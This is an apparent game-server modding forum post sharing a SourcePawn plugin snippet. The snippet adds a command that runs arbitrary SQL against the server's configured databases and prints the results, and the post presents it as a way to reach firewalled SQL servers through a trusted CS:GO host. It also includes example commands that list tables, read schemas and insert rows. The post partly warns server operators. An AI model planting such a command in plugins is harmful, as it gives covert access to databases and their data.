Raised This Month: $ Target: $400
 0% 

[SNIPPET] Malicious Activites


  
 
 
Thread Tools Display Modes
Prev Previous Post   Next Post Next
Author Message
OSWO
Senior Member
Join Date: Jul 2015
Location: United Kingdom, London
Old 10-10-2016 , 17:30   [SNIPPET] Malicious Activites
Reply With Quote #1

You want your plugin to become Malicious? You want anyone to gain access over everything? SQL server firewall'ed? No Problem! Introducing all new!

So what this kinda shows is how a CS:GO server can be used as a VPN into a SQL server. Some SQL servers have a firewall to only allow inbound connections from a cs:go server, but this show you how to manipulate it.

So - at the end of the day - be very aware of who and what you give users to in your servers. There could theoretically a way to actually leave the confinement of the CS:GO server and access the whole VPS / Dedi entirely, but I haven't got up to that yet : ^)

Note: PrintToConsole has a limit on how much it can print, I could have it push to a stack and print a few at a time until it's all printed, but you can figure that one out : ^)

Some notable commands:

Code:
sm_test "example" "show tables;"
sm_test "example" "desc a_table_name;"
sm_test "example" "INSERT INTO exampe_example VALUES ('STEAM_1:1:1111', 100, 0.1, 'more text');"
PHP Code:
public Action command_test(int I_Clientint I_Args) {
    
char C_Server[64], C_Statement[512], C_Error[512];

    
GetCmdArg(1C_Serversizeof(C_Server));
    
GetCmdArg(2C_Statementsizeof(C_Statement));

    
Database New = SQL_Connect(C_ServertrueC_Errorsizeof(C_Error));

    if (New != 
INVALID_HANDLE) {
        
PrintToChat(I_Client"Connection To %s Successful"C_Server);

        
SQL_TQuery(New, sqlTestC_StatementGetClientUserId(I_Client), DBPrio_High);
        
PrintToChat(I_Client"Executing: %s"C_Statement);
    } else {
        
PrintToChat(I_Client"Error: %s"C_Error);
    }

    return 
Plugin_Handled;
}

public 
void sqlTest(Handle ownerHandle hndlchar[] errorint I_UserID) {
    
char C_buffer[512], C_String[512], C_FieldName[64];
    
int I_Client GetClientOfUserId(I_UserID);

    if (
IsClientInGame(I_Client)) {
        if (
hndl != INVALID_HANDLE) {
            
PrintToChat(I_Client"Executed");

            if (
SQL_GetRowCount(hndl) > 0) {
                
int I_Fields SQL_GetFieldCount(hndl);

                for (
int i 0I_Fieldsi++) {
                    
SQL_FieldNumToName(hndliC_FieldNamesizeof(C_FieldName));
                    
Format(C_buffersizeof(C_buffer), "%s%s: "C_bufferC_FieldName);
                }

                
PrintToConsole(I_ClientC_buffer);
                
Format(C_buffersizeof(C_buffer), "");

                while (
SQL_FetchRow(hndl)) {
                    for (
int i 0I_Fieldsi++) {
                        
SQL_FetchString(hndliC_Stringsizeof(C_String));
                        
Format(C_buffersizeof(C_buffer), "%s%s, "C_bufferC_String);
                    }

                    
PrintToConsole(I_ClientC_buffer);
                    
Format(C_buffersizeof(C_buffer), "");
                }
            }
        } else {
            
PrintToChat(I_Clienterror);
        }
    }

Example Taken From TangoTimer:
Spoiler
__________________
SourceTimer | WeaponSkins++ | BasePlugins++ https://github.com/OSCAR-WOS

Last edited by OSWO; 10-11-2016 at 05:01. Reason: Some
OSWO is offline
 



Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT -4. The time now is 18:52.


Powered by vBulletin®
Copyright ©2000 - 2024, vBulletin Solutions, Inc.
Theme made by Freecode